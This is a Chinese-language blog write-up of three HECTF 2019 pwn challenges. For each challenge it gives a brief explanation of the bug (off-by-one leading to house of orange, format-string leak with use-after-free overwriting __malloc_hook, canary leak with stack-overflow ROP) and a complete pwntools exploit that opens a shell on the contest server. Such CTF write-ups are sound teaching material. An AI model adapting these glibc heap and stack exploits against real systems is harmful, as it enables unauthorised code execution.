Whali3n51's blog

  • 主页
  • 关于
  • 友链
  • 标签
  • 分类
Writeup

HECTF_Pwn_wp

Whali3n51 发布于 2019-11-11

这个比赛我没怎么玩,主要是比赛当天有事,据说是新手向的题目,是河北师范大学举办的比赛,我只做了里面几道题。

0x01 hard_pwn

就存在一个off-by-one,可以直接解造成堆块重叠,进而使用house of orange来getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
from pwn import *

context.log_level="debug"
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
def free(index):
p.sendlineafter(': ',"3")
p.sendlineafter(': ',str(index))

def create(size):
p.sendlineafter(': ',"1")
p.sendlineafter(': ',str(size))

def edit(index,size,content):
p.sendlineafter(': ',"2")
p.sendlineafter(': ',str(index))
p.sendlineafter(": ",str(size))
p.sendafter(':',content)

def show(index):
p.sendlineafter(': ',"4")
p.sendlineafter(': ',str(index))

#p=process("./hard_pwn")
p=remote("183.129.189.60",10026)
create(0x90)#0
create(0xf8)#1
create(0x90)#2
create(0x90)#3
free(0)
edit(1,0x100,0xf0*'a'+p64(0x1a0)+p64(0xa0))
free(2)
create(0x90)#0
show(1)
p.recvuntil("You play is ")
libc_base=u64(p.recv(6).ljust(8,'\x00'))-(0x00007ffff7dd1b78-0x7ffff7a0d000)
_IO_list_all=libc_base+libc.symbols['_IO_list_all']
success("libc_base=====>0x%x"%libc_base)
pause()
fake_file=p64(0)+p64(0x61)
edit(0,0xa0,'a'*0x90+fake_file)
fake_file=p64(0)+p64(_IO_list_all-0x10)
fake_file+=p64(1)+p64(2)
fake_file+=p64(0)+p64(libc_base+0x18cd57)
fake_file=fake_file.ljust(0xc8,"\x00")
fake_file+=p64(libc_base+0x3c37a0-8)
fake_file+=p64(0)
fake_file+=p64(libc_base+libc.symbols['system'])
edit(1,0x100,fake_file)
#gdb.attach(p)
create(0xf8)#1
p.interactive()

0x02 pwn_disco

说实话本题画风还是挺搞笑的,运行程序的时候我笑了好久。存在漏洞有两个,让这一题变得简单起来,一个是格式化字符串,直接可以泄露出libc基址出来,另一个是UAF,当free堆块之后,存在悬挂指针,直接攻击__malloc_hook然后修改为one_gadget来getshell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
from pwn import *
p=remote("183.129.189.60",10002)
#p=process('./pwn_disco')
context.log_level="debug"
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")

def create(index,content):
p.sendlineafter('Your Choice:',"2")
p.sendlineafter('Your Choice:',"1")
p.sendlineafter('index:',str(index))
p.sendafter('color:',content)

def edit(index,content):
p.sendlineafter('Your Choice:',"2")
p.sendlineafter('Your Choice:',"0")
p.sendlineafter(":",str(index))
p.sendafter('color:',content)
def free(index):
p.sendlineafter('Your Choice:',"3")
p.sendlineafter('index:',str(index))

p.sendlineafter('Your Choice:',"1")
p.sendlineafter('draw:',"%15$p")
p.recvuntil('0x')
libc_base=int(p.recv(12),16)-(0x7f7e0aafb830-0x7f7e0aadb000)
success("libc_base===>0x%x"%libc_base)
create(0,'11111')
free(0)
edit(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
create(0,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
onegad=[0x45216,0x4526a,0xf02a4,0xf1147]
create(1,'\x00'*(0x13-0x8)+p64(libc_base+onegad[3])+p64(libc_base+onegad[3]))
free(0)
p.sendlineafter('Your Choice:',"2")
p.sendlineafter('Your Choice:',"1")
p.sendlineafter('index:','0')

#gdb.attach(p)
p.interactive()

0x03 stackpwn2

这一题真新手向题目,也是存在两个洞,一个是格式化字符串来泄露canary,然后又存在栈溢出

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
from pwn import *
from LibcSearcher import *
p=process('./stackpwn2')
#p=remote('183.129.189.60',10000)
p.recvuntil('checking the output system...\n')
pause()
p.sendline('%9$p')
p.recvuntil('0x')
canary=int(p.recv(16),16)
payload='a'*0x18+p64(canary)+'aaaaaaaa'+p64(0x00000000004009c3)+p64(0x000000000601018)+p64(0x0400650)+p64(0x0000000004008A2)
p.sendlineafter("What you want to do?\n",payload)
puts_addr=u64(p.recv(6).ljust(8,'\x00'))
obj=LibcSearcher('puts',puts_addr)
libc_base=puts_addr-obj.dump('puts')
payload='a'*0x18+p64(canary)+'aaaaaaaa'+p64(0x00000000004009c3)+p64(libc_base+obj.dump("str_bin_sh"))+p64(libc_base+obj.dump('system'))+p64(0x0000000004008A2)
p.sendline(payload)
p.interactive()
  • #UAF
  • #house of orange
Newer

湖湘杯线上赛pwn_wp

Older

上海大学生网络安全PWN_wp

© 2022 Whali3n51